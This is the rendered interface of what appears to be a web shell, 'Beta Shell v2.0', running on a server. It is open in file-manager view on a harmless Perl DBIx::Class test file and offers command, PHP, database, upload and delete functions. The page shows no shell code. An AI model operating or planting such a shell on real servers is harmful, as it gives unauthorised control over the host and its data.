Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-DBIx-Class
/
t
/
lib
/
DBICNSTest
/
OtherRslt
Upload
3 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
D.pm
153 B
-rw-r--r--
2019-10-28 07:52:34
Edit
Del
Editing: D.pm
(153 B)
Path: /usr/share/doc/perl-DBIx-Class/t/lib/DBICNSTest/OtherRslt/D.pm
Back
package DBICNSTest::OtherRslt::D; use warnings; use strict; use base qw/DBIx::Class::Core/; __PACKAGE__->table('d'); __PACKAGE__->add_columns('d'); 1;